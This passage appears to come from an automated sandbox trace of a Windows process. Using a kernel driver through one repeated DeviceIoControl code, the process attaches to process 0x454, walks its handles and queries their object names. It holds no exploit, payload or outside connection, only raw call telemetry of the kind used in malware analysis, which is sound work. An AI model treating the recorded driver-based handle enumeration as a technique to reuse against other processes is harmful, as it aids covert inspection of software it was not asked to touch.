(Object=0xfffffa80036d0060) returned 0x18a [0224.389] ObQueryNameString (in: Object=0xfffffa8003813070, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.389] ObfDereferenceObject (Object=0xfffffa8003813070) returned 0x2 [0224.389] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.389] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.389] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.389] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xf8, lpOverlapped=0x0) returned 1 [0224.389] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.389] PsAcquireProcessExitSynchronization () returned 0x0 [0224.389] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.389] ObReferenceObjectByHandle (in: Handle=0x47c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80037df760, HandleInformation=0x0) returned 0x0 [0224.389] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.389] PsReleaseProcessExitSynchronization () returned 0x2 [0224.389] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.389] ObQueryNameString (in: Object=0xfffffa80037df760, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.390] ObfDereferenceObject (Object=0xfffffa80037df760) returned 0x2 [0224.390] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.390] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.390] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.390] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x78, lpOverlapped=0x0) returned 1 [0224.390] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.390] PsAcquireProcessExitSynchronization () returned 0x0 [0224.390] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.390] ObReferenceObjectByHandle (in: Handle=0x494, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00117b080, HandleInformation=0x0) returned 0x0 [0224.390] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.390] PsReleaseProcessExitSynchronization () returned 0x2 [0224.390] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.390] ObQueryNameString (in: Object=0xfffff8a00117b080, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.390] ObfDereferenceObject (Object=0xfffff8a00117b080) returned 0x2 [0224.390] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.390] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.390] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.390] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xfa, lpOverlapped=0x0) returned 1 [0224.390] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.390] PsAcquireProcessExitSynchronization () returned 0x0 [0224.390] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.390] ObReferenceObjectByHandle (in: Handle=0x4a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0019676a0, HandleInformation=0x0) returned 0x0 [0224.390] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.390] PsReleaseProcessExitSynchronization () returned 0x2 [0224.390] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.390] ObQueryNameString (in: Object=0xfffff8a0019676a0, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.391] ObfDereferenceObject (Object=0xfffff8a0019676a0) returned 0x2 [0224.391] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.391] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.391] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.391] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xdc, lpOverlapped=0x0) returned 1 [0224.391] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.391] PsAcquireProcessExitSynchronization () returned 0x0 [0224.391] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.391] ObReferenceObjectByHandle (in: Handle=0x4a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80019dabc0, HandleInformation=0x0) returned 0x0 [0224.391] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.391] PsReleaseProcessExitSynchronization () returned 0x2 [0224.391] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.391] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.391] ObfDereferenceObject (Object=0xfffffa80019dabc0) returned 0xe [0224.391] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.391] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.391] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.391] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x82, lpOverlapped=0x0) returned 1 [0224.391] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.391] PsAcquireProcessExitSynchronization () returned 0x0 [0224.391] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.391] ObReferenceObjectByHandle (in: Handle=0x4ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001176770, HandleInformation=0x0) returned 0x0 [0224.391] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.391] PsReleaseProcessExitSynchronization () returned 0x2 [0224.391] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.391] ObQueryNameString (in: Object=0xfffff8a001176770, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.391] ObfDereferenceObject (Object=0xfffff8a001176770) returned 0x2 [0224.391] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.391] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.391] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.392] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xb0, lpOverlapped=0x0) returned 1 [0224.392] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.392] PsAcquireProcessExitSynchronization () returned 0x0 [0224.392] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.392] ObReferenceObjectByHandle (in: Handle=0x4e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0010bbe70, HandleInformation=0x0) returned 0x0 [0224.392] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.392] PsReleaseProcessExitSynchronization () returned 0x2 [0224.392] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.392] ObQueryNameString (in: Object=0xfffff8a0010bbe70, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.392] ObfDereferenceObject (Object=0xfffff8a0010bbe70) returned 0x7 [0224.392] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.392] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.392] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.392] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0224.392] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.392] PsAcquireProcessExitSynchronization () returned 0x0 [0224.392] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.392] ObReferenceObjectByHandle (in: Handle=0x4f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80038761d0, HandleInformation=0x0) returned 0x0 [0224.392] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.392] PsReleaseProcessExitSynchronization () returned 0x2 [0224.392] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.392] ObQueryNameString (in: Object=0xfffffa80038761d0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.392] ObfDereferenceObject (Object=0xfffffa80038761d0) returned 0x2 [0224.392] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.392] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.392] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.392] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0224.392] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.392] PsAcquireProcessExitSynchronization () returned 0x0 [0224.392] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.393] ObReferenceObjectByHandle (in: Handle=0x4fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800385a2d0, HandleInformation=0x0) returned 0x0 [0224.393] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.393] PsReleaseProcessExitSynchronization () returned 0x2 [0224.393] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.393] ObQueryNameString (in: Object=0xfffffa800385a2d0, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.393] ObfDereferenceObject (Object=0xfffffa800385a2d0) returned 0x2 [0224.393] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.393] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.393] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.393] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xc8, lpOverlapped=0x0) returned 1 [0224.393] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.393] PsAcquireProcessExitSynchronization () returned 0x0 [0224.393] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.393] ObReferenceObjectByHandle (in: Handle=0x504, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003873750, HandleInformation=0x0) returned 0x0 [0224.393] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.393] PsReleaseProcessExitSynchronization () returned 0x2 [0224.393] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.393] ObQueryNameString (in: Object=0xfffffa8003873750, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.393] ObfDereferenceObject (Object=0xfffffa8003873750) returned 0x2 [0224.393] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.393] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.393] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.393] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xc8, lpOverlapped=0x0) returned 1 [0224.393] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.393] PsAcquireProcessExitSynchronization () returned 0x0 [0224.393] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.393] ObReferenceObjectByHandle (in: Handle=0x50c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003873600, HandleInformation=0x0) returned 0x0 [0224.393] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.393] PsReleaseProcessExitSynchronization () returned 0x2 [0224.393] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.394] ObQueryNameString (in: Object=0xfffffa8003873600, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.394] ObfDereferenceObject (Object=0xfffffa8003873600) returned 0x2 [0224.394] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.394] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.394] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.394] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0224.394] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.394] PsAcquireProcessExitSynchronization () returned 0x0 [0224.394] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.394] ObReferenceObjectByHandle (in: Handle=0x514, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80038734b0, HandleInformation=0x0) returned 0x0 [0224.394] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.394] PsReleaseProcessExitSynchronization () returned 0x2 [0224.394] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.394] ObQueryNameString (in: Object=0xfffffa80038734b0, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.394] ObfDereferenceObject (Object=0xfffffa80038734b0) returned 0x2 [0224.394] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.394] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.394] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.394] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0224.394] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.394] PsAcquireProcessExitSynchronization () returned 0x0 [0224.394] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.394] ObReferenceObjectByHandle (in: Handle=0x51c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003879770, HandleInformation=0x0) returned 0x0 [0224.394] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.394] PsReleaseProcessExitSynchronization () returned 0x2 [0224.394] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.394] ObQueryNameString (in: Object=0xfffffa8003879770, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.395] ObfDereferenceObject (Object=0xfffffa8003879770) returned 0x2 [0224.395] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.395] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.395] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.395] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x62, lpOverlapped=0x0) returned 1 [0224.395] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.395] PsAcquireProcessExitSynchronization () returned 0x0 [0224.395] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.395] ObReferenceObjectByHandle (in: Handle=0x524, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003879620, HandleInformation=0x0) returned 0x0 [0224.395] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.395] PsReleaseProcessExitSynchronization () returned 0x2 [0224.395] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.395] ObQueryNameString (in: Object=0xfffffa8003879620, ObjectNameInfo=0xfffffa8003082044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003082044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.395] ObfDereferenceObject (Object=0xfffffa8003879620) returned 0x2 [0224.395] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.395] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.395] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.395] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x62, lpOverlapped=0x0) returned 1 [0224.395] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.395] PsAcquireProcessExitSynchronization () returned 0x0 [0224.395] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.395] ObReferenceObjectByHandle (in: Handle=0x52c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002e6f2c0, HandleInformation=0x0) returned 0x0 [0224.396] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.396] PsReleaseProcessExitSynchronization () returned 0x2 [0224.396] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.396] ObQueryNameString (in: Object=0xfffffa8002e6f2c0, ObjectNameInfo=0xfffffa8003080044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003080044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.396] ObfDereferenceObject (Object=0xfffffa8002e6f2c0) returned 0x2 [0224.396] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.396] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.396] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.396] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xb8, lpOverlapped=0x0) returned 1 [0224.396] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.396] PsAcquireProcessExitSynchronization () returned 0x0 [0224.396] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.396] ObReferenceObjectByHandle (in: Handle=0x534, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80034aa680, HandleInformation=0x0) returned 0x0 [0224.396] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.396] PsReleaseProcessExitSynchronization () returned 0x2 [0224.396] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.396] ObQueryNameString (in: Object=0xfffffa80034aa680, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.396] ObfDereferenceObject (Object=0xfffffa80034aa680) returned 0x2 [0224.396] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.396] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.396] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.396] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: 